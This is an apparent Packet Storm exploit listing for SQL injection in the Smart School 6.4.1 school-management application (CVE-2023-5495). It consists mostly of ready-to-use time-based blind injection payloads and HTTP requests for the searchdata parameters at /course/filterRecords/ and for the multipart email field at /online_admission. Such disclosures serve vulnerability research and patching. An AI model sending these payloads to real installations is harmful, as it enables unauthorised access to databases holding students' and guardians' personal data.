Lucene search

K
packetstormCraCkErPACKETSTORM:175071
HistoryOct 11, 2023 - 12:00 a.m.

Smart School 6.4.1 SQL Injection

2023-10-1100:00:00
CraCkEr
packetstormsecurity.com
146
smart school 6.4.1
sql injection
unauthorized access
data modification
application crash
vendor qdocs
database access
cwe-89
cwe-74
cwe-707

0.001 Low

EPSS

Percentile

33.5%

`# Exploit Title: Smart School 6.4.1 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 28/09/2023  
# Vendor: QDocs - qdocs.net  
# Vendor Homepage: https://smart-school.in/  
# Software Link: https://demo.smart-school.in/  
# Tested on: Windows 10 Pro  
# Impact: Database Access  
# CVE: CVE-2023-5495  
# CWE: CWE-89 - CWE-74 - CWE-707  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.  
  
  
Path: /course/filterRecords/  
  
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]  
  
-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1  
  
  
searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3  
  
-------------------------------------------  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
  
  
Path: /course/filterRecords/  
  
  
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi  
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi  
  
---  
Parameter: searchdata[0][title] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[0][searchfield] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[0][searchvalue] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[1][title] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low  
  
Parameter: searchdata[1][searchvalue] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z  
---  
  
  
-------------------------------------------  
POST /course/filterRecords/ HTTP/1.1  
  
  
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]  
-------------------------------------------  
  
  
  
Path: /online_admission  
  
---  
Parameter: MULTIPART email ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--  
---  
  
POST Parameter 'email' is vulnerable to SQLi  
  
POST /online_admission HTTP/1.1  
  
-----------------------------320375734131102816923531485385  
Content-Disposition: form-data; name="email"  
  
*[SQLi]  
-----------------------------320375734131102816923531485385  
  
  
[-] Done  
`

0.001 Low

EPSS

Percentile

33.5%

Related for PACKETSTORM:175071